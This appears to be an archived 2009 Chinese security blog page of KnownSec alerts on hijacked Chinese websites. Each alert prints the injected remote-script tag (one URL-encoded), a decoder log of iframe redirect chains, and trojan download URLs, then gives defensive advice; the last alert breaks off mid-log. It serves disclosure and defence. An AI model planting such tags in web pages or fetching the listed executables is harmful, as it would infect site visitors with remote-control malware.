This theme is downloaded from wordpress themes website.

Archive for December, 2009

沈阳电信被植入恶意代码

发布时间:Thu Dec 17 2009 19:10:50 UTC+0800
最后更新时间:Thu Dec 17 2009 19:10:50 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 沈阳电信(http://sy-telecom.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://sy-telecom.com/

网页被嵌入恶意链接代码:
<script src=http://a.ll8cc.cn></script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://sy-telecom.com/
    [script]http://a.ll8cc.cn
        [iframe]http://c.8883.ss.la/4/google.htm
            [iframe]http://c.8883.ss.la/4/search.htm
                [script]http://c.8883.ss.la/4/google_ad.js
                    [iframe]http://c.8883.ss.la/4/cqqmp.htm
                        [script]http://c.8883.ss.la/4/cqqskin.css
                            [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/show.jpg
                        [script]http://c.8883.ss.la/4/shows.jpg
                [script]http://c.8883.ss.la/4/google_ads.js
                    [iframe]http://c.8883.ss.la/4/ec1.htm
                        [script]http://c.8883.ss.la/4/ec4.js
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyfl.htm
                    [iframe]http://c.8883.ss.la/4/ecof.htm
                        [script]http://c.8883.ss.la/4/off.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fydvd.htm
                    [iframe]http://c.8883.ss.la/4/fycry.htm
                        [script]http://c.8883.ss.la/4/cry.css
                            [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/google_adx.js
                    [iframe]http://c.8883.ss.la/4/cqq0.htm
                        [script]http://c.8883.ss.la/4/cqq2s.css
                        [script]http://c.8883.ss.la/4/cqq2.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecb.htm
                        [iframe]http://c.8883.ss.la/4/ecbbb.htm
                            [script]http://c.8883.ss.la/4/ecfff.js
                                [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyr.htm
                        [script]http://c.8883.ss.la/4/rr.js
                            [iframe]http://c.8883.ss.la/4/evilr.htm
                                [script]http://c.8883.ss.la/4/evilrr.js
                                    [exe]http://fuck.ss.la/4.exe
                            [iframe]http://c.8883.ss.la/4/fyre1.htm
                                [script]http://c.8883.ss.la/4/fyr1.js
                                    [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/zz.js
                            [iframe]http://c.8883.ss.la/4/fylz.htm
                                [script]http://c.8883.ss.la/4/xxxxz.js
                                    [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecfox.htm
                        [iframe]http://c.8883.ss.la/4/ecffx.htm
                            [script]http://c.8883.ss.la/4/ecfox.js
                                [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/music.js
                    [iframe]http://c.8883.ss.la/4/sfpf.htm
        [iframe]http://www.sesesemml.cn/?8d512986
            [iframe]http://df4554fer.3322.org/xp/360.html?chunjie123
                [iframe]http://df4554fer.3322.org/xp/yt.htm
                    [script]http://df4554fer.3322.org/xp/nop.jpg
                    [script]http://df4554fer.3322.org/xp/ml.jpg
                    [script]http://df4554fer.3322.org/xp/rl.jpg
                        [exe]http://dl7900.3322.org/xp/1.css
                    [script]http://df4554fer.3322.org/xp/kl.jpg
                [iframe]http://df4554fer.3322.org/xp/ytu.htm
                    [iframe]http://df4554fer.3322.org/xp/of.htm
                        [script]http://df4554fer.3322.org/xp/rl.jpg
                        [script]http://df4554fer.3322.org/xp/nop.jpg
                        [script]http://df4554fer.3322.org/xp/fq.jpg
                    [iframe]http://df4554fer.3322.org/xp/yut.htm
                        [iframe]http://df4554fer.3322.org/xp/ytfl1.htm
                [iframe]http://df4554fer.3322.org/xp/t9.htm
                    [script]http://df4554fer.3322.org/xp/rl.jpg
            [script]http://www.sesesemml.cn/dl1.js
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://tg.01lm.com/kk18_baidu.exe
                [exe]http://tg.01lm.com/paopao8_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://tg.01lm.com/quliao_baidu.exe
            [iframe]http://www.sesesemml.cn/images/mv.htm
                [script]http://www.sesesemml.cn/images/mv.files/flash_mv.js
            [iframe]http://www.sesesemml.cn/images/float_baidu.htm
                [script]http://www.sesesemml.cn/images/float_baidu.files/yui-utilities.js
                    [script]http://:
                [script]http://www.sesesemml.cn/images/float_baidu.files/tbra.js
                    [script]http://www.sesesemml.cn/images/float_baidu.files/locale/+
                [script]http://www.sesesemml.cn/images/dl2.js
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
        [iframe]http://a.mmzfc.cn/zz/a.htm?8d512986
            [iframe]http://dddertsa.8866.org/auto/imgasp/asp.html?za
        [iframe]http://a.mmzfc.cn/zz/11.htm?8d512986
        [iframe]http://fffsder.7766.org/htmlasp/imgasp/asp.html?z2
        [iframe]http://a.ppmmoo.cn/tj.htm
最终下载病毒文件:
http://fuck.ss.la/4.exe
http://www.sesesemml.cn/baidu_10.exe
http://tg.01lm.com/kk18_baidu.exe
http://tg.01lm.com/paopao8_baidu.exe
http://122.227.42.206:8080/qliao_baidu.exe
http://tg.01lm.com/quliao_baidu.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:11
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 17 Dec 2009 No Comments

中国电视新闻网被植入恶意代码

发布时间:Thu Dec 17 2009 08:06:57 UTC+0800
最后更新时间:Thu Dec 17 2009 08:06:57 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国电视新闻网(http://www.chinatvn.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://classic.chinatvn.com/

网页被嵌入恶意链接代码:
<script src=http://%38%38%35%38%2E%73%73%2E%6C%61></script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://classic.chinatvn.com/
    [script]http://classic.chinatvn.com/webresource.axd?d=mypwxa6smxrumwbascyd1q2&amp;t=633456902031875000
    [script]http://8858.ss.la
        [iframe]http://c.8883.ss.la/4/google.htm
            [iframe]http://c.8883.ss.la/4/search.htm
                [script]http://c.8883.ss.la/4/google_ad.js
                    [iframe]http://c.8883.ss.la/4/cqqmp.htm
                        [script]http://c.8883.ss.la/4/cqqskin.css
                            [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/show.jpg
                        [script]http://c.8883.ss.la/4/shows.jpg
                [script]http://c.8883.ss.la/4/google_ads.js
                    [iframe]http://c.8883.ss.la/4/ec1.htm
                        [script]http://c.8883.ss.la/4/ec4.js
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyfl.htm
                    [iframe]http://c.8883.ss.la/4/ecof.htm
                        [script]http://c.8883.ss.la/4/off.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fydvd.htm
                    [iframe]http://c.8883.ss.la/4/fycry.htm
                        [script]http://c.8883.ss.la/4/cry.css
                            [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/google_adx.js
                    [iframe]http://c.8883.ss.la/4/cqq0.htm
                        [script]http://c.8883.ss.la/4/cqq2s.css
                        [script]http://c.8883.ss.la/4/cqq2.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecb.htm
                        [iframe]http://c.8883.ss.la/4/ecbbb.htm
                            [script]http://c.8883.ss.la/4/ecfff.js
                                [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyr.htm
                        [script]http://c.8883.ss.la/4/rr.js
                            [iframe]http://c.8883.ss.la/4/evilr.htm
                                [script]http://c.8883.ss.la/4/evilrr.js
                                    [exe]http://fuck.ss.la/4.exe
                            [iframe]http://c.8883.ss.la/4/fyre1.htm
                                [script]http://c.8883.ss.la/4/fyr1.js
                                    [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/zz.js
                            [iframe]http://c.8883.ss.la/4/fylz.htm
                                [script]http://c.8883.ss.la/4/xxxxz.js
                                    [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecfox.htm
                        [iframe]http://c.8883.ss.la/4/ecffx.htm
                            [script]http://c.8883.ss.la/4/ecfox.js
                                [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/music.js
                    [iframe]http://c.8883.ss.la/4/sfpf.htm
        [iframe]http://www.sesesemml.cn/?25964826
            [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/alt.html?06
                [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/share.html
                    [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/a4.htm
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/14.js
                            [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/15.js
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/17.js
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/16.js
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/18.js
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/19.js
                    [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/ubb.htm
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/ll.jpg
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/ll1.jpg
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/upp.jpg
                            [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/llll1.jpg
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/llll.jpg
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/lllll.jpg
                    [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/a90.htm
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/uuub.jpg
                            [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/91.js
                        [script]http://fdgfd33ed.8866.org:8688/uploadhtml/90.js
                    [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/ring.htm
                        [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/uuf.htm
                            [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/i1.htm
                                [script]http://fdgfd33ed.8866.org:8688/uploadhtml/swfobject.js
                                [flash]http://fdgfd33ed.8866.org:8688/uploadhtml/i115.swf
                                    [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                                [flash]http://fdgfd33ed.8866.org:8688/uploadhtml/i47.swf
                                    [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                                [flash]http://fdgfd33ed.8866.org:8688/uploadhtml/i45.swf
                                    [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                                [flash]http://fdgfd33ed.8866.org:8688/uploadhtml/i64.swf
                                    [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                            [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/f2.htm
                                [script]http://fdgfd33ed.8866.org:8688/uploadhtml/swfobject.js
                                [flash]http://fdgfd33ed.8866.org:8688/uploadhtml/f115.swf
                                    [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                                [flash]http://fdgfd33ed.8866.org:8688/uploadhtml/f47.swf
                                    [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                                [flash]http://fdgfd33ed.8866.org:8688/uploadhtml/f45.swf
                                    [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                                [flash]http://fdgfd33ed.8866.org:8688/uploadhtml/f64.swf
                                    [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                            [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/i1.htm
                        [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/ukf.htm
                            [script]http://fdgfd33ed.8866.org:8688/uploadhtml/oopk.jpg
                                [exe]http://dns.adminmimi.com.cn:8688/css/upload.css
                            [script]http://fdgfd33ed.8866.org:8688/uploadhtml/ahg.jpg
                            [script]http://fdgfd33ed.8866.org:8688/uploadhtml/ahm.jpg
                    [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/rings.htm
                        [iframe]http://fdgfd33ed.8866.org:8688/uploadhtml/a10.htm
            [script]http://www.sesesemml.cn/dl1.js
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://tg.01lm.com/kk18_baidu.exe
                [exe]http://tg.01lm.com/paopao8_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://tg.01lm.com/quliao_baidu.exe
            [iframe]http://www.sesesemml.cn/images/mv.htm
                [script]http://www.sesesemml.cn/images/mv.files/flash_mv.js
            [iframe]http://www.sesesemml.cn/images/float_baidu.htm
                [script]http://www.sesesemml.cn/images/float_baidu.files/yui-utilities.js
                    [script]http://:
                [script]http://www.sesesemml.cn/images/float_baidu.files/tbra.js
                    [script]http://www.sesesemml.cn/images/float_baidu.files/locale/+
                [script]http://www.sesesemml.cn/images/dl2.js
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
        [iframe]http://a.mmzfc.cn/zz/a.htm?25964826
            [iframe]http://dddertsa.8866.org/auto/imgasp/asp.html?za
        [iframe]http://a.mmzfc.cn/zz/11.htm?25964826
            [iframe]http://nmnfgjfj.3322.org/auto/add/asp.html?03
        [iframe]http://fffsder.7766.org/htmlasp/imgasp/asp.html?z2
        [iframe]http://a.ppmmoo.cn/tj.htm
最终下载病毒文件:
http://fuck.ss.la/4.exe
http://dns.adminmimi.com.cn:8688/css/upload.css
http://www.sesesemml.cn/baidu_10.exe
http://tg.01lm.com/kk18_baidu.exe
http://tg.01lm.com/paopao8_baidu.exe
http://122.227.42.206:8080/qliao_baidu.exe
http://tg.01lm.com/quliao_baidu.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

该网站历史挂马次数:58
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 17 Dec 2009 No Comments

济南信息网络协会被植入恶意代码

发布时间:Wed Dec 16 2009 21:19:03 UTC+0800
最后更新时间:Wed Dec 16 2009 21:19:03 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 济南信息网络协会(http://www.jnina.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.jnina.cn/

网页被嵌入恶意链接代码:
<script src=http://a.ll8cc.cn></script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://www.jnina.cn/
    [script]http://a.ll8cc.cn
        [iframe]http://c.8883.ss.la/4/google.htm
            [iframe]http://c.8883.ss.la/4/search.htm
                [script]http://c.8883.ss.la/4/google_ad.js
                    [iframe]http://c.8883.ss.la/4/cqqmp.htm
                        [script]http://c.8883.ss.la/4/cqqskin.css
                            [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/show.jpg
                        [script]http://c.8883.ss.la/4/shows.jpg
                [script]http://c.8883.ss.la/4/google_ads.js
                    [iframe]http://c.8883.ss.la/4/ec1.htm
                        [script]http://c.8883.ss.la/4/ec4.js
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyfl.htm
                    [iframe]http://c.8883.ss.la/4/ecof.htm
                        [script]http://c.8883.ss.la/4/off.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fydvd.htm
                    [iframe]http://c.8883.ss.la/4/fycry.htm
                        [script]http://c.8883.ss.la/4/cry.css
                            [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/google_adx.js
                    [iframe]http://c.8883.ss.la/4/cqq0.htm
                        [script]http://c.8883.ss.la/4/cqq2s.css
                        [script]http://c.8883.ss.la/4/cqq2.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecb.htm
                        [iframe]http://c.8883.ss.la/4/ecbbb.htm
                            [script]http://c.8883.ss.la/4/ecfff.js
                                [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyr.htm
                        [script]http://c.8883.ss.la/4/rr.js
                            [iframe]http://c.8883.ss.la/4/evilr.htm
                                [script]http://c.8883.ss.la/4/evilrr.js
                                    [exe]http://fuck.ss.la/4.exe
                            [iframe]http://c.8883.ss.la/4/fyre1.htm
                                [script]http://c.8883.ss.la/4/fyr1.js
                                    [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/zz.js
                            [iframe]http://c.8883.ss.la/4/fylz.htm
                                [script]http://c.8883.ss.la/4/xxxxz.js
                                    [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecfox.htm
                        [iframe]http://c.8883.ss.la/4/ecffx.htm
                            [script]http://c.8883.ss.la/4/ecfox.js
                                [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/music.js
                    [iframe]http://c.8883.ss.la/4/sfpf.htm
        [iframe]http://www.sesesemml.cn/?d7804344
            [iframe]http://ghf56fff.7766.org:8688/uploadhtml/alt.html?06
                [iframe]http://ghf56fff.7766.org:8688/uploadhtml/share.html
                    [iframe]http://ghf56fff.7766.org:8688/uploadhtml/a4.htm
                    [iframe]http://ghf56fff.7766.org:8688/uploadhtml/ubb.htm
                    [iframe]http://ghf56fff.7766.org:8688/uploadhtml/a90.htm
                    [iframe]http://ghf56fff.7766.org:8688/uploadhtml/ring.htm
                    [iframe]http://ghf56fff.7766.org:8688/uploadhtml/rings.htm
            [script]http://www.sesesemml.cn/dl1.js
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://tg.01lm.com/kk18_baidu.exe
                [exe]http://tg.01lm.com/paopao8_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://tg.01lm.com/quliao_baidu.exe
            [iframe]http://www.sesesemml.cn/images/mv.htm
                [script]http://www.sesesemml.cn/images/mv.files/flash_mv.js
            [iframe]http://www.sesesemml.cn/images/float_baidu.htm
                [script]http://www.sesesemml.cn/images/float_baidu.files/yui-utilities.js
                    [script]http://:
                [script]http://www.sesesemml.cn/images/float_baidu.files/tbra.js
                    [script]http://www.sesesemml.cn/images/float_baidu.files/locale/+
                [script]http://www.sesesemml.cn/images/dl2.js
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
        [iframe]http://a.mmzfc.cn/zz/a.htm?d7804344
            [iframe]http://dddertsa.8866.org/auto/imgasp/asp.html?za
        [iframe]http://a.mmzfc.cn/zz/11.htm?d7804344
            [iframe]http://nmnfgjfj.3322.org/auto/add/asp.html?03
        [iframe]http://fffsder.7766.org/htmlasp/imgasp/asp.html?z2
        [iframe]http://a.ppmmoo.cn/tj.htm
最终下载病毒文件:
http://fuck.ss.la/4.exe
http://c.8883.ss.la/4/cqqskin.css
http://www.sesesemml.cn/baidu_10.exe
http://tg.01lm.com/kk18_baidu.exe
http://tg.01lm.com/paopao8_baidu.exe
http://122.227.42.206:8080/qliao_baidu.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:70
Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

网站挂马记录 lk 16 Dec 2009 No Comments

神州信息技术网被植入恶意代码

发布时间:Tue Dec 15 2009 23:53:30 UTC+0800
最后更新时间:Tue Dec 15 2009 23:53:30 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 神州信息技术网(http://www.chinait.net/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.chinait.net/

网页被嵌入恶意链接代码:
<script src=http://z360.net></script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://www.chinait.net/
    [script]http://z360.net
        [iframe]http://7o8.net/a.htm
            [iframe]http://aa345.7766.org:8688/downhtml/alt.html?ff
                [iframe]http://aa345.7766.org:8688/downhtml/share.html
                    [iframe]http://aa345.7766.org:8688/downhtml/a4.htm
                        [script]http://aa345.7766.org:8688/downhtml/14.js
                            [exe]http://down.ismydns.com.cn:8788/down.css
                        [script]http://aa345.7766.org:8688/downhtml/15.js
                        [script]http://aa345.7766.org:8688/downhtml/17.js
                        [script]http://aa345.7766.org:8688/downhtml/16.js
                        [script]http://aa345.7766.org:8688/downhtml/18.js
                        [script]http://aa345.7766.org:8688/downhtml/19.js
                    [iframe]http://aa345.7766.org:8688/downhtml/ubb.htm
                    [iframe]http://aa345.7766.org:8688/downhtml/a90.htm
                    [iframe]http://aa345.7766.org:8688/downhtml/ring.htm
                    [iframe]http://aa345.7766.org:8688/downhtml/rings.htm
最终下载病毒文件:
http://down.ismydns.com.cn:8788/down.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:18
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 15 Dec 2009 No Comments

中国上市公司资讯网被植入恶意代码

发布时间:Sun Dec 13 2009 23:51:35 UTC+0800
最后更新时间:Sun Dec 13 2009 23:51:35 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国上市公司资讯网(http://www.cnlist.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://bnb.cnlist.com/web/yjyg930.aspx?ygnd=2007-12-31

网页被嵌入恶意链接代码:
<script src=http://a.ll8cc.cn></script>

挂马分析:
Log generated by issmall use mdecoder 0.31
[root]http://bnb.cnlist.com/web/yjyg930.aspx?ygnd=2007-12-31
    [script]http://a.ll8cc.cn
        [iframe]http://c.8883.ss.la/4/google.htm
            [iframe]http://c.8883.ss.la/4/search.htm
                [script]http://c.8883.ss.la/4/google_ad.js
                    [iframe]http://c.8883.ss.la/4/cqqmp.htm
                        [script]http://c.8883.ss.la/4/cqqskin.css
                            [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/show.jpg
                        [script]http://c.8883.ss.la/4/shows.jpg
                [script]http://c.8883.ss.la/4/google_ads.js
                    [iframe]http://c.8883.ss.la/4/ec1.htm
                        [script]http://c.8883.ss.la/4/ec4.js
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyfl.htm
                    [iframe]http://c.8883.ss.la/4/ecof.htm
                        [script]http://c.8883.ss.la/4/off.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fydvd.htm
                    [iframe]http://c.8883.ss.la/4/fycry.htm
                        [script]http://c.8883.ss.la/4/cry.css
                            [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/google_adx.js
                    [iframe]http://c.8883.ss.la/4/cqq0.htm
                        [script]http://c.8883.ss.la/4/cqq2s.css
                        [script]http://c.8883.ss.la/4/cqq2.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecb.htm
                        [iframe]http://c.8883.ss.la/4/ecbbb.htm
                            [script]http://c.8883.ss.la/4/ecfff.js
                                [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyr.htm
                        [script]http://c.8883.ss.la/4/rr.js
                            [iframe]http://c.8883.ss.la/4/evilr.htm
                                [script]http://c.8883.ss.la/4/evilrr.js
                                    [exe]http://fuck.ss.la/4.exe
                            [iframe]http://c.8883.ss.la/4/fyre1.htm
                                [script]http://c.8883.ss.la/4/fyr1.js
                                    [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/zz.js
                            [iframe]http://c.8883.ss.la/4/fylz.htm
                                [script]http://c.8883.ss.la/4/xxxxz.js
                                    [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecfox.htm
                        [iframe]http://c.8883.ss.la/4/ecffx.htm
                            [script]http://c.8883.ss.la/4/ecfox.js
                                [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/music.js
                    [iframe]http://c.8883.ss.la/4/sfpf.htm
        [iframe]http://www.sesesemml.cn/?40170954
            [iframe]http://sdf4g54df.3322.org/auto/uphtml/alt.html?06
            [script]http://www.sesesemml.cn/dl1.js
                [iframe]http://www.70ge.com/guanggao/ad.html
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://tg.01lm.com/kk18_baidu.exe
                [exe]http://tg.01lm.com/paopao8_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://tg.01lm.com/quliao_baidu.exe
            [iframe]http://www.sesesemml.cn/images/mv.htm
                [script]http://www.sesesemml.cn/images/mv.files/flash_mv.js
                    [iframe]http://www.70ge.com/guanggao/ad.html
                [iframe]http://www.70ge.com/guanggao/ad.html
            [iframe]http://www.sesesemml.cn/images/float_baidu.htm
                [script]http://www.sesesemml.cn/images/float_baidu.files/yui-utilities.js
                    [script]http://:
                    [iframe]http://www.70ge.com/guanggao/ad.html
                [script]http://www.sesesemml.cn/images/float_baidu.files/tbra.js
                    [script]http://www.sesesemml.cn/images/float_baidu.files/locale/+
                    [iframe]http://www.70ge.com/guanggao/ad.html
                [script]http://www.sesesemml.cn/images/dl2.js
                    [iframe]http://www.70ge.com/guanggao/ad.html
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
